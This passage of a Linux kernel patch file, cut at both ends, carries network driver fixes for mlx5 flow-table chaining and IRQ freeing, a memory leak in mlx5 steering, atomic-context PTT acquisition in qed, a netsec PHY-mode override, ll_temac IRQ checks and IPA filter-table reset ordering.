++	mlx5_irq_table_free_irqs(dev);
+ 	mutex_unlock(&table->lock);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+index d53749248fa09..e6674118bc428 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/fs_core.c
+@@ -860,7 +860,7 @@ static struct mlx5_flow_table *find_closest_ft_recursive(struct fs_node  *root,
+ 	struct fs_node *iter = list_entry(start, struct fs_node, list);
+ 	struct mlx5_flow_table *ft = NULL;
+ 
+-	if (!root || root->type == FS_TYPE_PRIO_CHAINS)
++	if (!root)
+ 		return NULL;
+ 
+ 	list_for_each_advance_continue(iter, &root->children, reverse) {
+@@ -876,20 +876,42 @@ static struct mlx5_flow_table *find_closest_ft_recursive(struct fs_node  *root,
+ 	return ft;
+ }
+ 
+-/* If reverse is false then return the first flow table in next priority of
+- * prio in the tree, else return the last flow table in the previous priority
+- * of prio in the tree.
++static struct fs_node *find_prio_chains_parent(struct fs_node *parent,
++					       struct fs_node **child)
++{
++	struct fs_node *node = NULL;
++
++	while (parent && parent->type != FS_TYPE_PRIO_CHAINS) {
++		node = parent;
++		parent = parent->parent;
++	}
++
++	if (child)
++		*child = node;
++
++	return parent;
++}
++
++/* If reverse is false then return the first flow table next to the passed node
++ * in the tree, else return the last flow table before the node in the tree.
++ * If skip is true, skip the flow tables in the same prio_chains prio.
+  */
+-static struct mlx5_flow_table *find_closest_ft(struct fs_prio *prio, bool reverse)
++static struct mlx5_flow_table *find_closest_ft(struct fs_node *node, bool reverse,
++					       bool skip)
+ {
++	struct fs_node *prio_chains_parent = NULL;
+ 	struct mlx5_flow_table *ft = NULL;
+ 	struct fs_node *curr_node;
+ 	struct fs_node *parent;
+ 
+-	parent = prio->node.parent;
+-	curr_node = &prio->node;
++	if (skip)
++		prio_chains_parent = find_prio_chains_parent(node, NULL);
++	parent = node->parent;
++	curr_node = node;
+ 	while (!ft && parent) {
+-		ft = find_closest_ft_recursive(parent, &curr_node->list, reverse);
++		if (parent != prio_chains_parent)
++			ft = find_closest_ft_recursive(parent, &curr_node->list,
++						       reverse);
+ 		curr_node = parent;
+ 		parent = curr_node->parent;
+ 	}
+@@ -897,15 +919,15 @@ static struct mlx5_flow_table *find_closest_ft(struct fs_prio *prio, bool revers
+ }
+ 
+ /* Assuming all the tree is locked by mutex chain lock */
+-static struct mlx5_flow_table *find_next_chained_ft(struct fs_prio *prio)
++static struct mlx5_flow_table *find_next_chained_ft(struct fs_node *node)
+ {
+-	return find_closest_ft(prio, false);
++	return find_closest_ft(node, false, true);
+ }
+ 
+ /* Assuming all the tree is locked by mutex chain lock */
+-static struct mlx5_flow_table *find_prev_chained_ft(struct fs_prio *prio)
++static struct mlx5_flow_table *find_prev_chained_ft(struct fs_node *node)
+ {
+-	return find_closest_ft(prio, true);
++	return find_closest_ft(node, true, true);
+ }
+ 
+ static struct mlx5_flow_table *find_next_fwd_ft(struct mlx5_flow_table *ft,
+@@ -917,7 +939,7 @@ static struct mlx5_flow_table *find_next_fwd_ft(struct mlx5_flow_table *ft,
+ 	next_ns = flow_act->action & MLX5_FLOW_CONTEXT_ACTION_FWD_NEXT_NS;
+ 	fs_get_obj(prio, next_ns ? ft->ns->node.parent : ft->node.parent);
+ 
+-	return find_next_chained_ft(prio);
++	return find_next_chained_ft(&prio->node);
+ }
+ 
+ static int connect_fts_in_prio(struct mlx5_core_dev *dev,
+@@ -941,21 +963,55 @@ static int connect_fts_in_prio(struct mlx5_core_dev *dev,
+ 	return 0;
+ }
+ 
++static struct mlx5_flow_table *find_closet_ft_prio_chains(struct fs_node *node,
++							  struct fs_node *parent,
++							  struct fs_node **child,
++							  bool reverse)
++{
++	struct mlx5_flow_table *ft;
++
++	ft = find_closest_ft(node, reverse, false);
++
++	if (ft && parent == find_prio_chains_parent(&ft->node, child))
++		return ft;
++
++	return NULL;
++}
++
+ /* Connect flow tables from previous priority of prio to ft */
+ static int connect_prev_fts(struct mlx5_core_dev *dev,
+ 			    struct mlx5_flow_table *ft,
+ 			    struct fs_prio *prio)
+ {
++	struct fs_node *prio_parent, *parent = NULL, *child, *node;
+ 	struct mlx5_flow_table *prev_ft;
++	int err = 0;
++
++	prio_parent = find_prio_chains_parent(&prio->node, &child);
++
++	/* return directly if not under the first sub ns of prio_chains prio */
++	if (prio_parent && !list_is_first(&child->list, &prio_parent->children))
++		return 0;
+ 
+-	prev_ft = find_prev_chained_ft(prio);
+-	if (prev_ft) {
++	prev_ft = find_prev_chained_ft(&prio->node);
++	while (prev_ft) {
+ 		struct fs_prio *prev_prio;
+ 
+ 		fs_get_obj(prev_prio, prev_ft->node.parent);
+-		return connect_fts_in_prio(dev, prev_prio, ft);
++		err = connect_fts_in_prio(dev, prev_prio, ft);
++		if (err)
++			break;
++
++		if (!parent) {
++			parent = find_prio_chains_parent(&prev_prio->node, &child);
++			if (!parent)
++				break;
++		}
++
++		node = child;
++		prev_ft = find_closet_ft_prio_chains(node, parent, &child, true);
+ 	}
+-	return 0;
++	return err;
+ }
+ 
+ static int update_root_ft_create(struct mlx5_flow_table *ft, struct fs_prio
+@@ -1094,7 +1150,7 @@ static int connect_flow_table(struct mlx5_core_dev *dev, struct mlx5_flow_table
+ 		if (err)
+ 			return err;
+ 
+-		next_ft = first_ft ? first_ft : find_next_chained_ft(prio);
++		next_ft = first_ft ? first_ft : find_next_chained_ft(&prio->node);
+ 		err = connect_fwd_rules(dev, ft, next_ft);
+ 		if (err)
+ 			return err;
+@@ -1169,7 +1225,7 @@ static struct mlx5_flow_table *__mlx5_create_flow_table(struct mlx5_flow_namespa
+ 
+ 	tree_init_node(&ft->node, del_hw_flow_table, del_sw_flow_table);
+ 	next_ft = unmanaged ? ft_attr->next_ft :
+-			      find_next_chained_ft(fs_prio);
++			      find_next_chained_ft(&fs_prio->node);
+ 	ft->def_miss_action = ns->def_miss_action;
+ 	ft->ns = ns;
+ 	err = root->cmds->create_flow_table(root, ft, ft_attr, next_ft);
+@@ -2157,13 +2213,20 @@ EXPORT_SYMBOL(mlx5_del_flow_rules);
+ /* Assuming prio->node.children(flow tables) is sorted by level */
+ static struct mlx5_flow_table *find_next_ft(struct mlx5_flow_table *ft)
+ {
++	struct fs_node *prio_parent, *child;
+ 	struct fs_prio *prio;
+ 
+ 	fs_get_obj(prio, ft->node.parent);
+ 
+ 	if (!list_is_last(&ft->node.list, &prio->node.children))
+ 		return list_next_entry(ft, node.list);
+-	return find_next_chained_ft(prio);
++
++	prio_parent = find_prio_chains_parent(&prio->node, &child);
++
++	if (prio_parent && list_is_first(&child->list, &prio_parent->children))
++		return find_closest_ft(&prio->node, false, false);
++
++	return find_next_chained_ft(&prio->node);
+ }
+ 
+ static int update_root_ft_destroy(struct mlx5_flow_table *ft)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
+index 23cb63fa45886..2e728e4e81fac 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
++++ b/drivers/net/ethernet/mellanox/mlx5/core/mlx5_irq.h
+@@ -14,6 +14,7 @@ int mlx5_irq_table_init(struct mlx5_core_dev *dev);
+ void mlx5_irq_table_cleanup(struct mlx5_core_dev *dev);
+ int mlx5_irq_table_create(struct mlx5_core_dev *dev);
+ void mlx5_irq_table_destroy(struct mlx5_core_dev *dev);
++void mlx5_irq_table_free_irqs(struct mlx5_core_dev *dev);
+ int mlx5_irq_table_get_num_comp(struct mlx5_irq_table *table);
+ int mlx5_irq_table_get_sfs_vec(struct mlx5_irq_table *table);
+ struct mlx5_irq_table *mlx5_irq_table_get(struct mlx5_core_dev *dev);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+index 662f1d55e30e0..5e0f7d96aac51 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/pci_irq.c
+@@ -591,6 +591,24 @@ static void irq_pools_destroy(struct mlx5_irq_table *table)
+ 	irq_pool_free(table->pf_pool);
+ }
+ 
++static void mlx5_irq_pool_free_irqs(struct mlx5_irq_pool *pool)
++{
++	struct mlx5_irq *irq;
++	unsigned long index;
++
++	xa_for_each(&pool->irqs, index, irq)
++		free_irq(irq->irqn, &irq->nh);
++}
++
++static void mlx5_irq_pools_free_irqs(struct mlx5_irq_table *table)
++{
++	if (table->sf_ctrl_pool) {
++		mlx5_irq_pool_free_irqs(table->sf_comp_pool);
++		mlx5_irq_pool_free_irqs(table->sf_ctrl_pool);
++	}
++	mlx5_irq_pool_free_irqs(table->pf_pool);
++}
++
+ /* irq_table API */
+ 
+ int mlx5_irq_table_init(struct mlx5_core_dev *dev)
+@@ -670,6 +688,17 @@ void mlx5_irq_table_destroy(struct mlx5_core_dev *dev)
+ 	pci_free_irq_vectors(dev->pdev);
+ }
+ 
++void mlx5_irq_table_free_irqs(struct mlx5_core_dev *dev)
++{
++	struct mlx5_irq_table *table = dev->priv.irq_table;
++
++	if (mlx5_core_is_sf(dev))
++		return;
++
++	mlx5_irq_pools_free_irqs(table);
++	pci_free_irq_vectors(dev->pdev);
++}
++
+ int mlx5_irq_table_get_sfs_vec(struct mlx5_irq_table *table)
+ {
+ 	if (table->sf_comp_pool)
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+index 84364691a3791..d7b1a230b59e8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/steering/dr_cmd.c
+@@ -538,11 +538,12 @@ int mlx5dr_cmd_create_reformat_ctx(struct mlx5_core_dev *mdev,
+ 
+ 	err = mlx5_cmd_exec(mdev, in, inlen, out, sizeof(out));
+ 	if (err)
+-		return err;
++		goto err_free_in;
+ 
+ 	*reformat_id = MLX5_GET(alloc_packet_reformat_context_out, out, packet_reformat_id);
+-	kvfree(in);
+ 
++err_free_in:
++	kvfree(in);
+ 	return err;
+ }
+ 
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_dev_api.h b/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
+index f8682356d0cf4..94d4f9413ab7a 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_dev_api.h
+@@ -193,6 +193,22 @@ void qed_hw_remove(struct qed_dev *cdev);
+  */
+ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn);
+ 
++/**
++ * qed_ptt_acquire_context(): Allocate a PTT window honoring the context
++ *			      atomicy.
++ *
++ * @p_hwfn: HW device data.
++ * @is_atomic: Hint from the caller - if the func can sleep or not.
++ *
++ * Context: The function should not sleep in case is_atomic == true.
++ * Return: struct qed_ptt.
++ *
++ * Should be called at the entry point to the driver
++ * (at the beginning of an exported function).
++ */
++struct qed_ptt *qed_ptt_acquire_context(struct qed_hwfn *p_hwfn,
++					bool is_atomic);
++
+ /**
+  * qed_ptt_release(): Release PTT Window.
+  *
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_fcoe.c b/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
+index 3764190b948eb..04602ac947087 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_fcoe.c
+@@ -693,13 +693,14 @@ static void _qed_fcoe_get_pstats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static int qed_fcoe_get_stats(struct qed_hwfn *p_hwfn,
+-			      struct qed_fcoe_stats *p_stats)
++			      struct qed_fcoe_stats *p_stats,
++			      bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+ 
+ 	memset(p_stats, 0, sizeof(*p_stats));
+ 
+-	p_ptt = qed_ptt_acquire(p_hwfn);
++	p_ptt = qed_ptt_acquire_context(p_hwfn, is_atomic);
+ 
+ 	if (!p_ptt) {
+ 		DP_ERR(p_hwfn, "Failed to acquire ptt\n");
+@@ -973,19 +974,27 @@ static int qed_fcoe_destroy_conn(struct qed_dev *cdev,
+ 					QED_SPQ_MODE_EBLOCK, NULL);
+ }
+ 
++static int qed_fcoe_stats_context(struct qed_dev *cdev,
++				  struct qed_fcoe_stats *stats,
++				  bool is_atomic)
++{
++	return qed_fcoe_get_stats(QED_AFFIN_HWFN(cdev), stats, is_atomic);
++}
++
+ static int qed_fcoe_stats(struct qed_dev *cdev, struct qed_fcoe_stats *stats)
+ {
+-	return qed_fcoe_get_stats(QED_AFFIN_HWFN(cdev), stats);
++	return qed_fcoe_stats_context(cdev, stats, false);
+ }
+ 
+ void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-				 struct qed_mcp_fcoe_stats *stats)
++				 struct qed_mcp_fcoe_stats *stats,
++				 bool is_atomic)
+ {
+ 	struct qed_fcoe_stats proto_stats;
+ 
+ 	/* Retrieve FW statistics */
+ 	memset(&proto_stats, 0, sizeof(proto_stats));
+-	if (qed_fcoe_stats(cdev, &proto_stats)) {
++	if (qed_fcoe_stats_context(cdev, &proto_stats, is_atomic)) {
+ 		DP_VERBOSE(cdev, QED_MSG_STORAGE,
+ 			   "Failed to collect FCoE statistics\n");
+ 		return;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_fcoe.h b/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
+index 19c85adf4ceb1..214e8299ecb4e 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_fcoe.h
+@@ -28,8 +28,20 @@ int qed_fcoe_alloc(struct qed_hwfn *p_hwfn);
+ void qed_fcoe_setup(struct qed_hwfn *p_hwfn);
+ 
+ void qed_fcoe_free(struct qed_hwfn *p_hwfn);
++/**
++ * qed_get_protocol_stats_fcoe(): Fills provided statistics
++ *				  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - if the func can sleep or not.
++ *
++ * Context: The function should not sleep in case is_atomic == true.
++ * Return: Void.
++ */
+ void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-				 struct qed_mcp_fcoe_stats *stats);
++				 struct qed_mcp_fcoe_stats *stats,
++				 bool is_atomic);
+ #else /* CONFIG_QED_FCOE */
+ static inline int qed_fcoe_alloc(struct qed_hwfn *p_hwfn)
+ {
+@@ -40,7 +52,8 @@ static inline void qed_fcoe_setup(struct qed_hwfn *p_hwfn) {}
+ static inline void qed_fcoe_free(struct qed_hwfn *p_hwfn) {}
+ 
+ static inline void qed_get_protocol_stats_fcoe(struct qed_dev *cdev,
+-					       struct qed_mcp_fcoe_stats *stats)
++					       struct qed_mcp_fcoe_stats *stats,
++					       bool is_atomic)
+ {
+ }
+ #endif /* CONFIG_QED_FCOE */
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_hw.c b/drivers/net/ethernet/qlogic/qed/qed_hw.c
+index 554f30b0cfd5e..6263f847b6b92 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_hw.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_hw.c
+@@ -23,7 +23,10 @@
+ #include "qed_reg_addr.h"
+ #include "qed_sriov.h"
+ 
+-#define QED_BAR_ACQUIRE_TIMEOUT 1000
++#define QED_BAR_ACQUIRE_TIMEOUT_USLEEP_CNT	1000
++#define QED_BAR_ACQUIRE_TIMEOUT_USLEEP		1000
++#define QED_BAR_ACQUIRE_TIMEOUT_UDELAY_CNT	100000
++#define QED_BAR_ACQUIRE_TIMEOUT_UDELAY		10
+ 
+ /* Invalid values */
+ #define QED_BAR_INVALID_OFFSET          (cpu_to_le32(-1))
+@@ -84,12 +87,22 @@ void qed_ptt_pool_free(struct qed_hwfn *p_hwfn)
+ }
+ 
+ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn)
++{
++	return qed_ptt_acquire_context(p_hwfn, false);
++}
++
++struct qed_ptt *qed_ptt_acquire_context(struct qed_hwfn *p_hwfn, bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+-	unsigned int i;
++	unsigned int i, count;
++
++	if (is_atomic)
++		count = QED_BAR_ACQUIRE_TIMEOUT_UDELAY_CNT;
++	else
++		count = QED_BAR_ACQUIRE_TIMEOUT_USLEEP_CNT;
+ 
+ 	/* Take the free PTT from the list */
+-	for (i = 0; i < QED_BAR_ACQUIRE_TIMEOUT; i++) {
++	for (i = 0; i < count; i++) {
+ 		spin_lock_bh(&p_hwfn->p_ptt_pool->lock);
+ 
+ 		if (!list_empty(&p_hwfn->p_ptt_pool->free_list)) {
+@@ -105,7 +118,12 @@ struct qed_ptt *qed_ptt_acquire(struct qed_hwfn *p_hwfn)
+ 		}
+ 
+ 		spin_unlock_bh(&p_hwfn->p_ptt_pool->lock);
+-		usleep_range(1000, 2000);
++
++		if (is_atomic)
++			udelay(QED_BAR_ACQUIRE_TIMEOUT_UDELAY);
++		else
++			usleep_range(QED_BAR_ACQUIRE_TIMEOUT_USLEEP,
++				     QED_BAR_ACQUIRE_TIMEOUT_USLEEP * 2);
+ 	}
+ 
+ 	DP_NOTICE(p_hwfn, "PTT acquire timeout - failed to allocate PTT\n");
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_iscsi.c b/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
+index 511ab214eb9c8..980e7289b4814 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_iscsi.c
+@@ -999,13 +999,14 @@ static void _qed_iscsi_get_pstats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static int qed_iscsi_get_stats(struct qed_hwfn *p_hwfn,
+-			       struct qed_iscsi_stats *stats)
++			       struct qed_iscsi_stats *stats,
++			       bool is_atomic)
+ {
+ 	struct qed_ptt *p_ptt;
+ 
+ 	memset(stats, 0, sizeof(*stats));
+ 
+-	p_ptt = qed_ptt_acquire(p_hwfn);
++	p_ptt = qed_ptt_acquire_context(p_hwfn, is_atomic);
+ 	if (!p_ptt) {
+ 		DP_ERR(p_hwfn, "Failed to acquire ptt\n");
+ 		return -EAGAIN;
+@@ -1336,9 +1337,16 @@ static int qed_iscsi_destroy_conn(struct qed_dev *cdev,
+ 					   QED_SPQ_MODE_EBLOCK, NULL);
+ }
+ 
++static int qed_iscsi_stats_context(struct qed_dev *cdev,
++				   struct qed_iscsi_stats *stats,
++				   bool is_atomic)
++{
++	return qed_iscsi_get_stats(QED_AFFIN_HWFN(cdev), stats, is_atomic);
++}
++
+ static int qed_iscsi_stats(struct qed_dev *cdev, struct qed_iscsi_stats *stats)
+ {
+-	return qed_iscsi_get_stats(QED_AFFIN_HWFN(cdev), stats);
++	return qed_iscsi_stats_context(cdev, stats, false);
+ }
+ 
+ static int qed_iscsi_change_mac(struct qed_dev *cdev,
+@@ -1358,13 +1366,14 @@ static int qed_iscsi_change_mac(struct qed_dev *cdev,
+ }
+ 
+ void qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-				  struct qed_mcp_iscsi_stats *stats)
++				  struct qed_mcp_iscsi_stats *stats,
++				  bool is_atomic)
+ {
+ 	struct qed_iscsi_stats proto_stats;
+ 
+ 	/* Retrieve FW statistics */
+ 	memset(&proto_stats, 0, sizeof(proto_stats));
+-	if (qed_iscsi_stats(cdev, &proto_stats)) {
++	if (qed_iscsi_stats_context(cdev, &proto_stats, is_atomic)) {
+ 		DP_VERBOSE(cdev, QED_MSG_STORAGE,
+ 			   "Failed to collect ISCSI statistics\n");
+ 		return;
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_iscsi.h b/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
+index dec2b00259d42..974cb8d26608c 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_iscsi.h
+@@ -39,11 +39,14 @@ void qed_iscsi_free(struct qed_hwfn *p_hwfn);
+  *
+  * @cdev: Qed dev pointer.
+  * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - if the func can sleep or not.
+  *
++ * Context: The function should not sleep in case is_atomic == true.
+  * Return: Void.
+  */
+ void qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-				  struct qed_mcp_iscsi_stats *stats);
++				  struct qed_mcp_iscsi_stats *stats,
++				  bool is_atomic);
+ #else /* IS_ENABLED(CONFIG_QED_ISCSI) */
+ static inline int qed_iscsi_alloc(struct qed_hwfn *p_hwfn)
+ {
+@@ -56,7 +59,8 @@ static inline void qed_iscsi_free(struct qed_hwfn *p_hwfn) {}
+ 
+ static inline void
+ qed_get_protocol_stats_iscsi(struct qed_dev *cdev,
+-			     struct qed_mcp_iscsi_stats *stats) {}
++			     struct qed_mcp_iscsi_stats *stats,
++			     bool is_atomic) {}
+ #endif /* IS_ENABLED(CONFIG_QED_ISCSI) */
+ 
+ #endif
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.c b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+index 7776d3bdd459a..970b9aabbc3d7 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.c
+@@ -1863,7 +1863,8 @@ static void __qed_get_vport_stats(struct qed_hwfn *p_hwfn,
+ }
+ 
+ static void _qed_get_vport_stats(struct qed_dev *cdev,
+-				 struct qed_eth_stats *stats)
++				 struct qed_eth_stats *stats,
++				 bool is_atomic)
+ {
+ 	u8 fw_vport = 0;
+ 	int i;
+@@ -1872,10 +1873,11 @@ static void _qed_get_vport_stats(struct qed_dev *cdev,
+ 
+ 	for_each_hwfn(cdev, i) {
+ 		struct qed_hwfn *p_hwfn = &cdev->hwfns[i];
+-		struct qed_ptt *p_ptt = IS_PF(cdev) ? qed_ptt_acquire(p_hwfn)
+-						    :  NULL;
++		struct qed_ptt *p_ptt;
+ 		bool b_get_port_stats;
+ 
++		p_ptt = IS_PF(cdev) ? qed_ptt_acquire_context(p_hwfn, is_atomic)
++				    : NULL;
+ 		if (IS_PF(cdev)) {
+ 			/* The main vport index is relative first */
+ 			if (qed_fw_vport(p_hwfn, 0, &fw_vport)) {
+@@ -1900,6 +1902,13 @@ out:
+ }
+ 
+ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
++{
++	qed_get_vport_stats_context(cdev, stats, false);
++}
++
++void qed_get_vport_stats_context(struct qed_dev *cdev,
++				 struct qed_eth_stats *stats,
++				 bool is_atomic)
+ {
+ 	u32 i;
+ 
+@@ -1908,7 +1917,7 @@ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats)
+ 		return;
+ 	}
+ 
+-	_qed_get_vport_stats(cdev, stats);
++	_qed_get_vport_stats(cdev, stats, is_atomic);
+ 
+ 	if (!cdev->reset_stats)
+ 		return;
+@@ -1960,7 +1969,7 @@ void qed_reset_vport_stats(struct qed_dev *cdev)
+ 	if (!cdev->reset_stats) {
+ 		DP_INFO(cdev, "Reset stats not allocated\n");
+ 	} else {
+-		_qed_get_vport_stats(cdev, cdev->reset_stats);
++		_qed_get_vport_stats(cdev, cdev->reset_stats, false);
+ 		cdev->reset_stats->common.link_change_count = 0;
+ 	}
+ }
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_l2.h b/drivers/net/ethernet/qlogic/qed/qed_l2.h
+index a538cf478c14e..2d2f82c785ad2 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_l2.h
++++ b/drivers/net/ethernet/qlogic/qed/qed_l2.h
+@@ -249,8 +249,32 @@ qed_sp_eth_rx_queues_update(struct qed_hwfn *p_hwfn,
+ 			    enum spq_mode comp_mode,
+ 			    struct qed_spq_comp_cb *p_comp_data);
+ 
++/**
++ * qed_get_vport_stats(): Fills provided statistics
++ *			  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ *
++ * Return: Void.
++ */
+ void qed_get_vport_stats(struct qed_dev *cdev, struct qed_eth_stats *stats);
+ 
++/**
++ * qed_get_vport_stats_context(): Fills provided statistics
++ *				  struct with statistics.
++ *
++ * @cdev: Qed dev pointer.
++ * @stats: Points to struct that will be filled with statistics.
++ * @is_atomic: Hint from the caller - if the func can sleep or not.
++ *
++ * Context: The function should not sleep in case is_atomic == true.
++ * Return: Void.
++ */
++void qed_get_vport_stats_context(struct qed_dev *cdev,
++				 struct qed_eth_stats *stats,
++				 bool is_atomic);
++
+ void qed_reset_vport_stats(struct qed_dev *cdev);
+ 
+ /**
+diff --git a/drivers/net/ethernet/qlogic/qed/qed_main.c b/drivers/net/ethernet/qlogic/qed/qed_main.c
+index c91898be7c030..25d9c254288b5 100644
+--- a/drivers/net/ethernet/qlogic/qed/qed_main.c
++++ b/drivers/net/ethernet/qlogic/qed/qed_main.c
+@@ -3101,7 +3101,7 @@ void qed_get_protocol_stats(struct qed_dev *cdev,
+ 
+ 	switch (type) {
+ 	case QED_MCP_LAN_STATS:
+-		qed_get_vport_stats(cdev, &eth_stats);
++		qed_get_vport_stats_context(cdev, &eth_stats, true);
+ 		stats->lan_stats.ucast_rx_pkts =
+ 					eth_stats.common.rx_ucast_pkts;
+ 		stats->lan_stats.ucast_tx_pkts =
+@@ -3109,10 +3109,10 @@ void qed_get_protocol_stats(struct qed_dev *cdev,
+ 		stats->lan_stats.fcs_err = -1;
+ 		break;
+ 	case QED_MCP_FCOE_STATS:
+-		qed_get_protocol_stats_fcoe(cdev, &stats->fcoe_stats);
++		qed_get_protocol_stats_fcoe(cdev, &stats->fcoe_stats, true);
+ 		break;
+ 	case QED_MCP_ISCSI_STATS:
+-		qed_get_protocol_stats_iscsi(cdev, &stats->iscsi_stats);
++		qed_get_protocol_stats_iscsi(cdev, &stats->iscsi_stats, true);
+ 		break;
+ 	default:
+ 		DP_VERBOSE(cdev, QED_MSG_SP,
+diff --git a/drivers/net/ethernet/socionext/netsec.c b/drivers/net/ethernet/socionext/netsec.c
+index 9b46579b5a103..b130e978366c1 100644
+--- a/drivers/net/ethernet/socionext/netsec.c
++++ b/drivers/net/ethernet/socionext/netsec.c
+@@ -1851,6 +1851,17 @@ static int netsec_of_probe(struct platform_device *pdev,
+ 		return err;
+ 	}
+ 
++	/*
++	 * SynQuacer is physically configured with TX and RX delays
++	 * but the standard firmware claimed otherwise for a long
++	 * time, ignore it.
++	 */
++	if (of_machine_is_compatible("socionext,developer-box") &&
++	    priv->phy_interface != PHY_INTERFACE_MODE_RGMII_ID) {
++		dev_warn(&pdev->dev, "Outdated firmware reports incorrect PHY mode, overriding\n");
++		priv->phy_interface = PHY_INTERFACE_MODE_RGMII_ID;
++	}
++
+ 	priv->phy_np = of_parse_phandle(pdev->dev.of_node, "phy-handle", 0);
+ 	if (!priv->phy_np) {
+ 		dev_err(&pdev->dev, "missing required property 'phy-handle'\n");
+diff --git a/drivers/net/ethernet/xilinx/ll_temac_main.c b/drivers/net/ethernet/xilinx/ll_temac_main.c
+index 1066420d6a83a..6bf5e341c3c11 100644
+--- a/drivers/net/ethernet/xilinx/ll_temac_main.c
++++ b/drivers/net/ethernet/xilinx/ll_temac_main.c
+@@ -1568,12 +1568,16 @@ static int temac_probe(struct platform_device *pdev)
+ 	}
+ 
+ 	/* Error handle returned DMA RX and TX interrupts */
+-	if (lp->rx_irq < 0)
+-		return dev_err_probe(&pdev->dev, lp->rx_irq,
++	if (lp->rx_irq <= 0) {
++		rc = lp->rx_irq ?: -EINVAL;
++		return dev_err_probe(&pdev->dev, rc,
+ 				     "could not get DMA RX irq\n");
+-	if (lp->tx_irq < 0)
+-		return dev_err_probe(&pdev->dev, lp->tx_irq,
++	}
++	if (lp->tx_irq <= 0) {
++		rc = lp->tx_irq ?: -EINVAL;
++		return dev_err_probe(&pdev->dev, rc,
+ 				     "could not get DMA TX irq\n");
++	}
+ 
+ 	if (temac_np) {
+ 		/* Retrieve the MAC address */
+diff --git a/drivers/net/ipa/ipa_table.c b/drivers/net/ipa/ipa_table.c
+index 510ff2dc8999a..cd81dd916c29e 100644
+--- a/drivers/net/ipa/ipa_table.c
++++ b/drivers/net/ipa/ipa_table.c
+@@ -311,16 +311,15 @@ static int ipa_filter_reset(struct ipa *ipa, bool modem)
+ 	if (ret)
+ 		return ret;
+ 
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V4_FILTER_HASHED, modem);
+-	if (ret)
++	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER, modem);
++	if (ret || !ipa_table_hash_support(ipa))
+ 		return ret;
+ 
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER, modem);
++	ret = ipa_filter_reset_table(ipa, IPA_MEM_V4_FILTER_HASHED, modem);
+ 	if (ret)
+ 		return ret;
+-	ret = ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER_HASHED, modem);
+ 
+-	return ret;
++	return ipa_filter_reset_table(ipa, IPA_MEM_V6_FILTER_HASHED, modem);
+ }
+ 
+ /* The AP routes and modem routes are each contiguous within the
+@@ -329,11 +328,12 @@ static int ipa_filter_reset(struct ipa *ipa, bool modem)
+  * */
+ static int ipa_route_reset(struct ipa *ipa, bool modem)
+ {
++	bool hash_support = ipa_table_hash_support(ipa);
+ 	struct gsi_trans *trans;
+ 	u16 first;
+ 	u16 count;
+ 
+-	trans = ipa_cmd_trans_alloc(ipa, 4);
